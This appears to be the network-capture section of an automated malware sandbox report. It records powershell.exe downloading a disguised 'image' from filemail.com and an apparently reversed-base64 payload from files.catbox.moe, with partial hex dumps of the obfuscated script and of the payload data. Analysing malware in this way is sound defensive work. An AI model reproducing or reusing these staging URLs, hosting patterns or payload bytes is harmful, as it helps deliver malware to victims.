                                                                                                        2024-11-20 19:33:32 UTC1274INData Raw: 6c 51 66 50 42 6f 53 57 63 52 57 5a 69 6d 6c 6c 6d 70 55 4e 4b 5a 65 69 68 67 55 61 6b 7a 66 6b 22 0d 0a 0d 0a 69 47 62 61 6e 49 4e 7a 78 68 69 4e 4f 62 5a 4e 4b 47 63 42 50 74 66 4b 4b 76 65 4e 6d 6f 62 62 6b 64 4a 50 70 4e 50 5a 63 49 4e 54 63 68 4b 65 52 6c 4c 41 4a 4c 69 55 57 6e 73 70 57 76 43 43 70 63 76 68 20 3d 20 22 5a 4c 6d 4b 6a 66 57 66 4b 69 55 54 57 42 6b 4c 62 49 62 5a 68 7a 4c 69 57 4f 68 57 71 48 57 4c 47 68 57 6d 61 41 52 5a 52 4c 6f 50 4e 57 47 65 69 47 65 57 6f 4c 75 4a 69 63 6e 65 52 4f 6e 4c 54 54 6f 57 22 0d 0a 47 4c 68 4b 4e 78 61 6b 76 57 4c 63 55 4b 7a 6b 47 6d 4b 6b 5a 48 62 61 6d 57 57 50 54 68 47 65 4c 6d 54 6b 47 7a 4b 68 65 73 68 62 70 70 6d 47 76 4f 4c 47 69 4c 47 4c 6c 6f 4b 6c 57 4c 57 57 69 61 41 47 20 3d 20 22 63 70 6d
                                                                                                        Data Ascii: lQfPBoSWcRWZimllmpUNKZeihgUakzfk"iGbanINzxhiNObZNKGcBPtfKKveNmobbkdJPpNPZcINTchKeRlLAJLiUWnspWvCCpcvh = "ZLmKjfWfKiUTWBkLbIbZhzLiWOhWqHWLGhWmaARZRLoPNWGeiGeWoLuJicneROnLTToW"GLhKNxakvWLcUKzkGmKkZHbamWWPThGeLmTkGzKheshbppmGvOLGiLGLloKlWLWWiaAG = "cpm


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.649734142.215.209.784433960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-20 19:33:48 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                        Host: 1017.filemail.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-20 19:33:49 UTC324INHTTP/1.1 200 OK
                                                                                                        Content-Length: 2230233
                                                                                                        Content-Type: image/jpeg
                                                                                                        Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                        X-Transfer-ID: wxhdiueivoluihj
                                                                                                        Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                        Date: Wed, 20 Nov 2024 19:33:48 GMT
                                                                                                        Connection: close
                                                                                                        2024-11-20 19:33:49 UTC2829INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b 80 01 ea 73 28 78 e4 72 6a 44 11 48 b2 b3 70 42 9e 83 16 f1 5d 24 be 21 a6 68 23 72 9b bd 25 be 1e f9 e5 fc 03 ec d2 68 fc 6e 67 3a a6 90 44 05 1e 39 27 eb 81 f4 74 f1 9d 36 8e 19 1e 59 f6 2c 5c 32 f7 51 99 7e 1d f6 df
                                                                                                        Data Ascii: q|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{s(xrjDHpB]$!h#r%hng:D9't6Y,\2Q~
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: e1 e3 2a 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1
                                                                                                        Data Ascii: *Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: 42 80 3f 9e 6b e8 1a 11 e1 5a 15 24 16 30 21 20 7f ba 33 c6 6b 34 eb a7 90 36 9e 63 22 b2 b0 03 b0 5a e7 9e 9e ff 00 96 7a 1f 0b d6 14 f0 b8 09 82 d9 54 2a 9a ea 28 60 6b 96 8e 36 f3 18 0d a0 d6 18 79 6e a0 95 e0 f4 23 32 c4 87 56 a6 3a a2 79 2b d0 8c 6a 13 2a 44 b1 9e 4a fb e0 5e 7d 8a a6 f6 91 fa e5 7c f0 cb b4 05 34 3d b2 b2 44 f2 2b 58 17 7f 2c 18 d3 b9 db 5c 10 68 f3 db 02 00 21 0a 03 c9 ef 58 1f 25 5d 8a be d6 db ce de f8 77 66 81 cf 98 85 80 1c 37 b6 20 64 47 d4 17 04 82 45 60 3b 2c 48 48 07 6d 11 c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90
                                                                                                        Data Ascii: B?kZ$0! 3k46c"ZzT*(`k6yn#2V:y+j*DJ^}|4=D+X,\h!X%]wf7 dGE`;,HHm$gbj60Y)V,0js?>F&g1<o7h|TjnXq5&
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: 65 23 90 45 70 0e 11 5c 1b 24 a7 3d 47 b6 26 64 64 41 c7 3f 1c 1a a9 72 4d d6 01 67 27 79 3c 00 3a 56 01 89 6e a7 38 93 c8 eb 9c 4e 07 2d 82 48 1d 32 db 99 ba 91 7d b2 36 d2 d8 3c e5 7b f3 81 72 18 02 4d 50 f8 e5 4f 39 07 a9 ac 8a c0 b8 52 5a 85 5f c4 e1 00 78 c5 82 6b da f8 c1 90 36 83 df 38 b1 6a ae 30 08 ec fb 81 b3 64 58 cb 96 2f 05 13 6d 76 70 5b dd 58 31 22 ea a8 e1 22 6d e7 6e d0 2b 92 7d f0 02 a7 69 e4 73 d4 5e 10 4b c1 6a 17 5c e5 a5 a9 24 b6 1b 68 55 62 e4 51 c0 e3 c9 ce 07 90 7d b2 2b 3a b0 2e ee 59 89 39 4a ce ac ea c0 ea c2 a3 aa ad 15 04 fc 70 55 92 05 91 ce 07 a1 d0 ea 74 e9 a6 8c 81 44 9f 50 f8 e0 b5 9a 89 16 70 a0 1f 28 35 9a f6 cc d3 a6 6a 57 8d 89 8d 8f 5e 94 71 c8 e7 af 4b 00 6c ed 07 df e3 81 a2 d6 86 77 5a dd 60 00 7b 70 3f be 0e 29
                                                                                                        Data Ascii: e#Ep\$=G&ddA?rMg'y<:Vn8N-H2}6<{rMPO9RZ_xk68j0dX/mvp[X1""mn+}is^Kj\$hUbQ}+:.Y9JpUtDPp(5jW^qKlwZ`{p?)
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: fd 33 e6 e1 1c 0e 97 f0 cf 65 fb 3e 32 47 37 8d bc 48 4c 8b e1 ea 54 02 07 ff 00 b4 43 ef 80 df 85 06 1f b4 ef 14 31 85 65 bf 12 21 41 2c 08 f2 a6 a1 67 17 fb 7a 61 4d 47 82 94 85 d2 56 f0 7d 1b 02 64 3b 4a 84 65 aa 22 ec 80 bd 0f e7 d7 34 b4 48 cd fb 5f f1 84 55 db 73 f8 90 1b 6b bc 53 0e b9 9b f6 db 4e d2 cb e0 b2 88 a4 47 93 c1 74 81 8b 1b 04 84 ad c3 f2 c0 f5 7f b7 54 77 f1 af 0a 70 c5 b7 69 99 41 1d 0b 06 36 2f e1 9f 37 d1 6b a7 89 02 49 08 05 46 d1 ea eb fe ab 3e 91 fb 5d d2 49 a5 f1 1f b3 f0 31 56 11 69 5d 76 a8 da 4b 06 5d cd ff 00 17 1f 96 7c dd 11 9f 50 bb 49 da 09 1c 0b be 7d f0 1e 7d 4c 8c 9b 8a 00 ac 38 b6 e3 f9 62 6f 23 91 b4 c7 1f 1d 0e ef ff 00 47 1c 9d 55 53 60 16 2e be 39 9e 62 7d d4 16 c0 6a bd dc 8f a6 05 c4 fe 4a ee 28 81 8f 40 1b af
                                                                                                        Data Ascii: 3e>2G7HLTC1e!A,gzaMGV}d;Je"4H_UskSNGtTwpiA6/7kIF>]I1Vi]vK]|PI}}L8bo#GUS`.9b}jJ(@
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: b7 96 28 9e 4b 2d f7 02 87 be 23 ff 00 c6 cf 28 0c ba df 0f 56 8c 33 6d 10 ca 37 70 69 4d ad fe 47 3c ff 00 87 f8 d6 a3 5f f6 87 ef b2 be 99 1d 15 99 04 81 fc b5 27 83 b4 2f 36 45 f5 c0 f5 9e 29 e0 11 ea 3c 2f 4d 2e 97 4f 2c d2 41 12 a4 71 82 22 66 5f 48 a6 2c bc 50 b3 5c 1e d8 de 93 ec 8f 85 2a 46 f3 69 8b 49 b1 43 a8 99 8a ab 00 6c f1 b7 ad fc b8 e8 30 3a 4f 1e d4 47 0c 47 c4 35 9a 28 24 75 56 f2 d7 4d 23 32 ab 0d c3 71 dd 57 4c 3a 63 bf fc 43 a3 db 29 6f 15 89 43 2f 58 f4 ce a7 ff 00 16 e1 d3 e0 70 0d a6 f0 1f 0a d2 bb 34 3a 18 99 8d 73 20 2f cf fc 44 9c be aa 57 d4 a3 04 d3 4e ea 19 54 b2 b9 8b 8d f4 d4 41 04 50 5d de cc 3a 5e 66 4d f6 a6 37 f4 45 36 81 24 bb 0c de 6b ee 51 c7 40 82 be 99 1a bd 7e bb fd 89 a5 d4 e9 bc 4e 28 a6 9a 52 86 41 01 64 60 4b
                                                                                                        Data Ascii: (K-#(V3m7piMG<_'/6E)</M.O,Aq"f_H,P\*FiICl0:OGG5($uVM#2qWL:cC)oC/Xp4:s /DWNTAP]:^fM7E6$kQ@~N(RAd`K
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: 39 1a 0d a6 42 8d d3 60 00 5d 77 38 b4 41 e0 9a 4a 76 37 e9 dc 3b e6 aa eb 23 75 90 95 06 46 5d c5 87 7b 1d 33 30 80 aa bd ec 13 5e f8 06 82 4f 2a 55 46 da 41 36 77 0e 4e 5b 5e ac da 80 e1 6d 5b b1 3d 31 78 2d e6 de 50 d0 15 64 e6 93 2e f4 50 79 f8 fb 60 66 24 76 f6 76 ad 1e 2f 1e f2 ca c6 18 a8 b2 0d 62 da 95 65 70 a1 36 95 3d 71 a2 ce da 51 34 6a 59 bf 0b 83 fc c6 02 64 b5 ae f2 b4 3d ba e7 15 0c 4b 0a af 8e 56 30 5d c9 0a b5 d3 e5 8d 04 55 4d a1 4b 37 7a 38 11 0c 8d a5 62 ec 54 10 0d 51 ba 3f 4c b8 95 66 8c cc 5f 93 f1 e8 71 32 83 d4 ce 83 71 24 d0 1f 2c 13 35 50 28 28 74 03 fa e0 3b 0c e5 4f a9 81 be a0 65 43 87 72 c4 f2 3a 62 65 eb 80 83 e9 87 d3 a9 2d b9 94 d5 56 06 da b0 6d 3c 6b bd 4d 72 72 16 91 8b 36 d0 6e fe 58 b3 a0 58 95 a3 8d 85 75 17 d7 2c
                                                                                                        Data Ascii: 9B`]w8AJv7;#uF]{30^O*UFA6wN[^m[=1x-Pd.Py`f$vv/bep6=qQ4jYd=KV0]UMK7z8bTQ?Lf_q2q$,5P((t;OeCr:be-Vm<kMrr6nXXu,
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: 5e ff 00 84 dd 57 d7 af d7 28 8d b6 c2 dd 73 5e c7 05 0b 5b 10 f6 45 5e 31 1c 42 40 cc 17 6a a8 b1 80 2f 33 71 2b 44 91 ed 97 8b 4b b9 77 c8 48 27 b6 1a 2d 2a b3 07 66 fc 42 c6 41 5d 4c 6c 51 5a d7 f8 4f b6 04 cf 18 fb ab 79 62 c5 8b f7 cf 6d fb 2a 9a 05 d4 7d a1 89 9d 84 92 f8 26 a5 55 56 ef 8d a4 d5 77 a1 9e 17 cd 64 a8 ef 71 3c 1f 86 7b 2f d9 64 4b 2f db 73 a4 91 5c a6 af 47 a9 85 c2 7e 2a 31 b1 35 f1 e3 01 bd 4c cf 3f ed 9b c2 11 a5 57 92 1f 10 d0 23 37 a8 ee 65 58 54 9e 45 dd a9 bb cb 7e d3 67 31 3f 86 45 21 6d ca fe 24 4b 96 34 59 b5 73 0e 17 b7 41 84 f1 28 74 fa 2f db 84 1e 58 61 1f fb 4b 46 ea b4 4b 53 08 9b b9 eb ce 53 f6 ad 13 b6 9b c2 75 bb 08 8e 6d 4f 88 d0 61 b5 95 86 a9 99 81 1f f1 0c 07 ff 00 69 ec b1 fd 8c fd 9f a9 be 7c 39 bd 43 df cb 80
                                                                                                        Data Ascii: ^W(s^[E^1B@j/3q+DKwH'-*fBA]LlQZOybm*}&UVwdq<{/dK/s\G~*15L?W#7eXTE~g1?E!m$K4YsA(t/XaKFKSSumOai|9C
                                                                                                        2024-11-20 19:33:49 UTC8192INData Raw: d9 da 68 fc ab ae 0e 48 dd 98 39 e4 83 6a 70 07 aa 55 01 5c bb 29 5d ca 42 fb 1e 9c 62 31 07 2b 3b 31 62 a0 0d bd bf d7 6c d2 97 6c ff 00 c2 40 ba 6b ae b8 b8 78 d5 5a 31 4c b6 47 18 09 19 1e 39 37 97 6a 65 04 01 d0 1a ac 89 b5 01 64 52 8c 7d 3c b7 5e 4e 56 68 c8 1b 40 3b 57 a0 f6 18 30 87 70 20 12 ac 2d 8d 74 ac 03 cf 38 9e 42 ca 68 ad 5f c3 9c 58 94 52 d2 93 ea dd f9 e7 2a 95 2c bb b8 3e ae 45 5f b6 55 54 f9 db 40 52 18 6e f9 1c 07 74 ce 8a b3 9d 95 fb a0 59 8e 3f 04 81 e1 49 17 80 62 06 ab e3 d7 13 d3 30 d3 ca 1e 65 66 47 3b 69 45 83 9a b0 4f a3 6b 20 90 a0 d2 a9 1d 30 32 8c 46 45 42 e1 9d 45 dc 7d fa e6 8e 89 52 2f 0e 54 92 e2 dc 08 ae e2 fe 39 62 f1 7a 88 fc 64 10 0a fb 62 32 ca 19 42 12 1d 57 a8 3c 8c 0d 65 9d 22 d1 c9 0c 93 2a 21 40 0b 0f 56 ea 37
                                                                                                        Data Ascii: hH9jpU\)]Bb1+;1bll@kxZ1LG97jedR}<^NVh@;W0p -t8Bh_XR*,>E_UT@RntY?Ib0efG;iEOk 02FEBE}R/T9bzdb2BW<e"*!@V7


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.649785108.181.20.354433960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-20 19:34:10 UTC76OUTGET /zj1o07.txt HTTP/1.1
                                                                                                        Host: files.catbox.moe
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-20 19:34:11 UTC560INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 20 Nov 2024 19:34:11 GMT
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 104448
                                                                                                        Last-Modified: Thu, 14 Nov 2024 15:38:58 GMT
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        ETag: "67361992-19800"
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-11-20 19:34:11 UTC15824INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                        2024-11-20 19:34:11 UTC16384INData Raw: 6b 42 41 4f 41 55 44 41 6b 42 67 5a 41 41 44 41 57 42 41 52 41 38 43 41 5a 42 51 55 41 6f 46 41 73 42 77 4b 41 49 46 41 77 41 77 59 41 67 48 41 6f 42 67 52 41 41 44 41 48 42 77 5a 41 34 45 41 76 42 51 65 41 51 48 41 7a 42 77 51 41 63 48 41 4e 42 41 5a 41 41 48 41 77 41 51 62 41 55 44 41 48 42 77 59 41 51 44 41 31 41 41 4e 41 49 44 41 49 42 41 61 41 45 44 41 44 42 41 4f 41 67 47 41 76 42 41 4d 41 38 45 41 42 42 67 64 41 4d 47 41 36 42 67 55 41 34 47 41 72 42 67 5a 41 63 48 41 31 41 51 62 41 6f 46 41 33 41 67 51 41 51 48 41 75 42 51 52 41 55 45 41 4c 42 51 65 41 63 44 41 33 41 67 4d 41 38 43 41 50 42 67 5a 41 34 47 41 68 42 77 59 41 63 47 41 72 42 51 63 41 73 43 41 34 42 67 5a 41 51 46 41 6f 42 41 57 41 6f 48 41 74 42 67 53 41 51 45 41 57 42 41 52 41 73 45
                                                                                                        Data Ascii: kBAOAUDAkBgZAADAWBARA8CAZBQUAoFAsBwKAIFAwAwYAgHAoBgRAADAHBwZA4EAvBQeAQHAzBwQAcHANBAZAAHAwAQbAUDAHBwYAQDA1AANAIDAIBAaAEDADBAOAgGAvBAMA8EABBgdAMGA6BgUA4GArBgZAcHA1AQbAoFA3AgQAQHAuBQRAUEALBQeAcDA3AgMA8CAPBgZA4GAhBwYAcGArBQcAsCA4BgZAQFAoBAWAoHAtBgSAQEAWBARAsE
                                                                                                        2024-11-20 19:34:11 UTC16384INData Raw: 33 6b 55 4d 36 6c 55 5a 57 70 57 5a 4e 42 67 57 79 45 55 56 30 70 55 62 72 56 47 65 30 5a 44 62 35 63 45 5a 70 70 48 41 5a 4a 46 52 76 68 6d 4e 31 74 6b 59 52 52 55 55 31 41 58 62 57 5a 30 59 41 67 6c 61 42 46 6e 59 53 56 58 4e 35 4e 6a 53 4d 42 54 59 4c 5a 6e 53 57 42 41 57 6e 64 56 51 74 42 48 52 30 67 46 54 34 4d 32 5a 42 4e 6c 52 34 4d 47 41 59 52 56 54 41 67 46 55 54 46 56 55 56 5a 33 54 4d 4e 48 41 59 39 30 53 49 6c 31 5a 49 5a 6c 62 31 77 32 54 69 35 30 54 4f 6c 44 5a 41 63 31 62 4e 4e 6a 4d 48 4e 31 56 6a 4e 6d 64 33 5a 47 62 32 4d 48 65 4f 42 77 56 53 4a 57 53 4d 6c 55 55 71 4e 58 4f 32 52 33 59 58 42 33 4e 4b 46 48 41 58 39 55 52 79 6c 46 4f 6c 6c 54 5a 41 63 31 52 7a 45 6d 51 31 68 31 54 54 42 77 56 31 49 55 65 5a 74 6b 59 56 78 55 61 41 59 46
                                                                                                        Data Ascii: 3kUM6lUZWpWZNBgWyEUV0pUbrVGe0ZDb5cEZppHAZJFRvhmN1tkYRRUU1AXbWZ0YAglaBFnYSVXN5NjSMBTYLZnSWBAWndVQtBHR0gFT4M2ZBNlR4MGAYRVTAgFUTFVUVZ3TMNHAY90SIl1ZIZlb1w2Ti50TOlDZAc1bNNjMHN1VjNmd3ZGb2MHeOBwVSJWSMlUUqNXO2R3YXB3NKFHAX9URylFOllTZAc1RzEmQ1h1TTBwV1IUeZtkYVxUaAYF
                                                                                                        2024-11-20 19:34:11 UTC16384INData Raw: 41 59 42 41 6b 77 52 2b 41 59 42 41 6b 55 69 2f 41 59 42 41 6b 55 53 38 41 59 42 41 4f 77 51 6e 41 4d 52 41 66 41 41 62 41 55 41 41 41 73 53 6e 41 41 51 41 41 45 77 48 41 77 47 41 64 42 41 41 45 73 4d 41 41 45 77 45 42 38 42 41 73 42 51 58 41 41 77 41 2f 41 41 41 42 4d 52 41 66 41 41 62 41 30 46 41 41 4d 77 76 41 41 51 41 54 45 77 48 41 77 47 41 64 42 41 41 42 55 4f 41 41 45 77 45 42 38 42 41 73 42 51 58 41 41 41 41 58 41 41 41 42 4d 52 41 66 41 41 62 41 30 46 41 41 41 41 4e 41 41 51 41 54 45 77 48 41 77 47 41 64 42 41 41 44 41 50 41 41 45 77 45 42 38 42 41 6b 42 51 42 41 41 77 4b 69 44 41 41 41 41 51 41 4f 41 51 59 41 55 51 44 53 53 41 75 41 41 42 41 41 45 77 43 41 41 47 41 46 4d 41 45 62 77 50 41 51 41 41 41 42 73 41 41 66 42 51 4f 41 41 77 42 79 41 41
                                                                                                        Data Ascii: AYBAkwR+AYBAkUi/AYBAkUS8AYBAOwQnAMRAfAAbAUAAAsSnAAQAAEwHAwGAdBAAEsMAAEwEB8BAsBQXAAwA/AAABMRAfAAbA0FAAMwvAAQATEwHAwGAdBAABUOAAEwEB8BAsBQXAAAAXAAABMRAfAAbA0FAAAANAAQATEwHAwGAdBAADAPAAEwEB8BAkBQBAAwKiDAAAAQAOAQYAUQDSSAuAABAAEwCAAGAFMAEbwPAQAAABsAAfBQOAAwByAA
                                                                                                        2024-11-20 19:34:11 UTC16384INData Raw: 41 41 41 41 69 42 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 67 55 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 46 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 6b 42 41 41 63 44 7a 43 55 72 41 57 4a 51 4c 41 6b 41 41 63 42 51 42 41 63 41 41 61 41 77 41 41 55 41 41 59 41 77 41 41 4d 41 41 57 41 77 41 41 55 41 41 74 41 51 41 41 55 41 41 73 41 67 41 41 4d 41 41 72 41 51 41 41 4d 41 41 71 41 67 41 42 59 31 41 42 44 41 41 42 49 31 41 34 43 41 41 41 45 41 41 46 4d 67 69 44 6f 33 41 6b 4e 77 57 44 55 31 41 51 4e 67 52 44 67 67 41 38 4c 77 32 43 67 72 41 67 4b 51 66 43 49 6d 41 49 4a 67 50 43 59 43 41 4c 41 41 41 41 59 41 41 42 45 51 38 42 49 50 41 75 45 51 71 41 73 49 41 75 45 41
                                                                                                        Data Ascii: AAAAiBQAAAAAAAAAAAAAAAABAAAAAAgUAEAAAAAAAAAAAAAAAQAAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAkBAAcDzCUrAWJQLAkAAcBQBAcAAaAwAAUAAYAwAAMAAWAwAAUAAtAQAAUAAsAgAAMAArAQAAMAAqAgABY1ABDAABI1A4CAAAEAAFMgiDo3AkNwWDU1AQNgRDggA8Lw2CgrAgKQfCImAIJgPCYCALAAAAYAABEQ8BIPAuEQqAsIAuEA
                                                                                                        2024-11-20 19:34:11 UTC16384INData Raw: 42 41 41 41 44 42 41 41 41 59 41 41 41 51 41 69 41 41 41 42 49 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 41 41 41 49 51 59 41 41 67 41 4e 42 41 41 41 51 42 41 41 41 67 41 41 41 41 4e 42 42 67 4b 41 41 41 41 41 30 74 4a 41 41 41 41 47 30 39 2f 2f 37 76 41 2f 6b 6d 6a 59 45 52 47 52 6b 78 45 59 64 52 47 52 6f 41 41 41 34 37 62 4b 41 41 41 76 2f 6d 42 6a 45 42 46 61 45 68 43 41 41 41 35 76 70 41 41 41 34 75 66 6b 45 68 43 41 41 51 37 76 35 52 45 4b 41 41 41 73 37 48 41 41 41 51 42 34 6f 41 41 41 73 75 66 41 41 41 41 4b 6f 54 48 52 51 53 45 4b 41 41 41 6b 2f 6d 43 41 41 67 36 2b 52 53 45 2f 2f 2f 2f 2f 39 44 49 52 55 53 45 6c 4d 42 57 58 55 53 45 4b 41 41 41 70 2f 57 4a 52 6f 41 41 41 67 75 66 6b 45 42 41 41 41 67 44 34 6f 41 41 41 51 2b
                                                                                                        Data Ascii: BAAADBAAAYAAAQAiAAABICAAAAAAAAAAAAAAAAAAA8AAAIQYAAgANBAAAQBAAAgAAAANBBgKAAAAA0tJAAAAG09//7vA/kmjYERGRkxEYdRGRoAAA47bKAAAv/mBjEBFaEhCAAA5vpAAA4ufkEhCAAQ7v5REKAAAs7HAAAQB4oAAAsufAAAAKoTHRQSEKAAAk/mCAAg6+RSE/////9DIRUSElMBWXUSEKAAAp/WJRoAAAgufkEBAAAgD4oAAAQ+
